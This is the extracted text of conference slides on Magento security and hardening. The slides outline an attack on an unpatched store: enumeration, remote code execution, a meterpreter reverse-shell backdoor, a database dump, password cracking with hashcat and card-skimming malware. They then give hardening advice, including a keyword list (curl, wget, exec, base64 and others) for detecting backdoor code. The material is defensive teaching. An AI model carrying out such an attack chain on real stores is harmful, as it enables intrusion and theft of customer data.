Upload
meet-magento-italy
View
63
Download
0
Embed Size (px)
Citation preview
Mar 2, 2017Meet Magento 2017, Milan
Andrea Zwirner – LinkspiritMagento security and hardening strategies 2
Magento security and hardening strategies
Andrea Zwirner
@AndreaZwirner
Sicurezza informatica
Mar 2, 2017Meet Magento 2017, Milan
Andrea Zwirner – LinkspiritMagento security and hardening strategies 3
● Linux, Apache, MariaDB, PHP
● Magento 1.9.x.y
– We will be as platform independent as possible
Environment
Mar 2, 2017Meet Magento 2017, Milan
Andrea Zwirner – LinkspiritMagento security and hardening strategies 4
● Magento is a good product, security is never underestimated
– Fast security patches for both 1.9.x and 2.x versions
– URL protection (via secret keys addition)
– Sessions validation (session poisoning, hijacking, fixation attacks)
– CSRF protection
– CAPCHA for admin login (brute force)
Magento average security
Mar 2, 2017Meet Magento 2017, Milan
Andrea Zwirner – LinkspiritMagento security and hardening strategies 5
● Sensitive data are encrypted via additional encryption key (cards, integration passwords)
● There also is a lot of documentation on security and hardening
Magento average security
Mar 2, 2017Meet Magento 2017, Milan
Andrea Zwirner – LinkspiritMagento security and hardening strategies 6
● Anyway, the team is doing a great job!
● But it might all be useless if…
Magento average security
Mar 2, 2017Meet Magento 2017, Milan
Andrea Zwirner – LinkspiritMagento security and hardening strategies 7
A secure platform in an insecure world
Hardware
Operating System
LibrariesApplication Services
Mar 2, 2017Meet Magento 2017, Milan
Andrea Zwirner – LinkspiritMagento security and hardening strategies 8
Full of unprepared users...
Hardware
Operating System
LibrariesApplication
User
Services
Mar 2, 2017Meet Magento 2017, Milan
Andrea Zwirner – LinkspiritMagento security and hardening strategies 9
● Workstations that work with the backend need to be hardened
● The same applies to the environment in which workstations work
– And the environments it is connected to, including suppliers, clients, etc
● Users need to be made aware of the risks they might expose the application to
Backend security
Mar 2, 2017Meet Magento 2017, Milan
Andrea Zwirner – LinkspiritMagento security and hardening strategies 10
What’s the strategy?
Mar 2, 2017Meet Magento 2017, Milan
Andrea Zwirner – LinkspiritMagento security and hardening strategies 11
“Ensuring cybersecurity is a common responsibility. End users play a crucial
role in ensuring the security of networks and information systems: they need to
be made aware of the risks they face online and be empowered to take simple
steps to guard against them.”
Cybersecurity Strategy of the European Union
European Commision, Feb 2013
Never understimate end users importance
Ok, let’s start!
Mar 2, 2017Meet Magento 2017, Milan
Andrea Zwirner – LinkspiritMagento security and hardening strategies 13
● If you want to crack it, you need to know it
● The quieter you become, the more you’re able to hear
● You can’t just try every single weapon you have in your armory
● This would alarm any kind of IPS at any level
Enumeration is the key
Mar 2, 2017Meet Magento 2017, Milan
Andrea Zwirner – LinkspiritMagento security and hardening strategies 14
Enumeration – /magento_version
Mar 2, 2017Meet Magento 2017, Milan
Andrea Zwirner – LinkspiritMagento security and hardening strategies 15
Enumeration - /downloader
Mar 2, 2017Meet Magento 2017, Milan
Andrea Zwirner – LinkspiritMagento security and hardening strategies 16
● /skin/frontend/default/default/css/styles.css
Enumeration – static files 1
Mar 2, 2017Meet Magento 2017, Milan
Andrea Zwirner – LinkspiritMagento security and hardening strategies 17
Enumeration – static files 2
Mar 2, 2017Meet Magento 2017, Milan
Andrea Zwirner – LinkspiritMagento security and hardening strategies 18
Enumeration in web application scanners
Mar 2, 2017Meet Magento 2017, Milan
Andrea Zwirner – LinkspiritMagento security and hardening strategies 19
It’s attack time!
● We have to do a couple of assumptions
– Magento vulnerable version (1.9.1.0 CE or 1.14.1.0 EE)
– Not patched with SUPEE-5344
– It means RCE… Uh ohhh…
Mar 2, 2017Meet Magento 2017, Milan
Andrea Zwirner – LinkspiritMagento security and hardening strategies 20
It’s attack time!
Mar 2, 2017Meet Magento 2017, Milan
Andrea Zwirner – LinkspiritMagento security and hardening strategies 21
It’s attack time!
Mar 2, 2017Meet Magento 2017, Milan
Andrea Zwirner – LinkspiritMagento security and hardening strategies 22
It’s attack time!
Mar 2, 2017Meet Magento 2017, Milan
Andrea Zwirner – LinkspiritMagento security and hardening strategies 23
It’s attack time!
● backdoor.tgz adds backdoor.php (a meterpreter reverse shell) in /errors
Mar 2, 2017Meet Magento 2017, Milan
Andrea Zwirner – LinkspiritMagento security and hardening strategies 24
It’s attack time!
● Misconfigurations
– Downloader is exposed and unprotected
– File system permissions has not been reset (maybe after last extension install)
Mar 2, 2017Meet Magento 2017, Milan
Andrea Zwirner – LinkspiritMagento security and hardening strategies 25
TCP reverse shell
Mar 2, 2017Meet Magento 2017, Milan
Andrea Zwirner – LinkspiritMagento security and hardening strategies 26
Getting DB credentials
Mar 2, 2017Meet Magento 2017, Milan
Andrea Zwirner – LinkspiritMagento security and hardening strategies 27
It’s attack time!
Mar 2, 2017Meet Magento 2017, Milan
Andrea Zwirner – LinkspiritMagento security and hardening strategies 28
DB dump!
Mar 2, 2017Meet Magento 2017, Milan
Andrea Zwirner – LinkspiritMagento security and hardening strategies 29
Passwords
● md5/sha-256(salt+password):salt no bcrypt, scrypt, pbkdf2 :-(
Mar 2, 2017Meet Magento 2017, Milan
Andrea Zwirner – LinkspiritMagento security and hardening strategies 30
Let’s crack them, with hashcat!
Mar 2, 2017Meet Magento 2017, Milan
Andrea Zwirner – LinkspiritMagento security and hardening strategies 31
Option two: frontend malware (common!)
Mar 2, 2017Meet Magento 2017, Milan
Andrea Zwirner – LinkspiritMagento security and hardening strategies 32
And your card number is?
Mar 2, 2017Meet Magento 2017, Milan
Andrea Zwirner – LinkspiritMagento security and hardening strategies 33
● Using vulnerable components (at any level of the stack)
– It doesn’t matter the Magento version you use, it has to be (quickly) patched!
Why all this stuff works?
Mar 2, 2017Meet Magento 2017, Milan
Andrea Zwirner – LinkspiritMagento security and hardening strategies 34
● Using vulnerable components (at any level of the stack)
– It doesn’t matter the Magento version you use, it has to be (quickly) patched!
● Misconfigurations
– Who works inside the environment has to (well) know what he is doing!
Why all this stuff works?
Mar 2, 2017Meet Magento 2017, Milan
Andrea Zwirner – LinkspiritMagento security and hardening strategies 35
● Monitor issues for every single component of the stack, and patch accordingly
● Restrict access to administrative functions from specific IP addesses
● Hide sensitive URLs (admin / downloader / extensions) with custom URLs
● Block access to development / staging / test environments
So, let’s harden it – basic
Mar 2, 2017Meet Magento 2017, Milan
Andrea Zwirner – LinkspiritMagento security and hardening strategies 36
● Run Magento inside a dedicated environment
● Always apply the principle of the least privilege
● Automate the deployment process
– Extensions should not be installed in production
– Implement automated checks (unit test, static code analisys, etc)
● Audit user list and enable 2 factor authentication (Nexcess, miniOrange, etc)
So, let’s harden it – mid
Mar 2, 2017Meet Magento 2017, Milan
Andrea Zwirner – LinkspiritMagento security and hardening strategies 37
● Check Admin Action Logs and compare with policies / timing / etc
● Check file integrity (compare production with clean version) / mtimes, etc
● Monitor all system logins and compare with policies / timing / etc
● Choose extensions accordingly (e.g. ASVS compliance / code review / pen-test)
– If possible, avoid using extensions with upload functions
So, let’s harden it - advanced
Mar 2, 2017Meet Magento 2017, Milan
Andrea Zwirner – LinkspiritMagento security and hardening strategies 38
● Monitor for common malicious functions or code
– curl(, FILE_APPEND, file_put_, fwrite, , http.open, http.send, mail, <script, etc
● Monitor for files bigger than 2-3 Mb
– They can contain stolen data to be sent to the attacker
● Monitor for common backdoor code
– A lot: base64, exec, wget, system, move_uploaded_file, encodeURI, etc
So, let’s harden it - advanced
Mar 2, 2017Meet Magento 2017, Milan
Andrea Zwirner – LinkspiritMagento security and hardening strategies 39
● Do anything you can to make enumeration harder
– Remove service banners
– Metadata
– Remove/change static files
● *_version, README, etc
● *css, *js
So, let’s harden it - advanced
Mar 2, 2017Meet Magento 2017, Milan
Andrea Zwirner – LinkspiritMagento security and hardening strategies 40
A common attack: brute force
Mar 2, 2017Meet Magento 2017, Milan
Andrea Zwirner – LinkspiritMagento security and hardening strategies 41
● Should we just wait for the attacker to guess the password?
● Intrusion Prevention Systems
– Policy verification trough log analysis
● Web application firewalls
– Configuration (platform dependent)
– Review (at least on application changes)
Intrusion Prevention
Mar 2, 2017Meet Magento 2017, Milan
Andrea Zwirner – LinkspiritMagento security and hardening strategies 42
● Should we just wait for the attacker to find the right path?
● Attacks informations must be collected and analyzed
● You have to understand who is the attacker and what’s his goal
Know your enemy
Mar 2, 2017Meet Magento 2017, Milan
Andrea Zwirner – LinkspiritMagento security and hardening strategies 43
● Make sure your governance level is granular enough to understand what’s happening
● You have to know what the system is doing and not just that it is “working”
● And if everything has been fucked up, the keywords are
– Backup– Restore– Disaster recovery plan
And then… Shit happens!
Mar 2, 2017Meet Magento 2017, Milan
Andrea Zwirner – LinkspiritMagento security and hardening strategies 44
Magento security and hardening strategies
Andrea Zwirner
@AndreaZwirner
Sicurezza informatica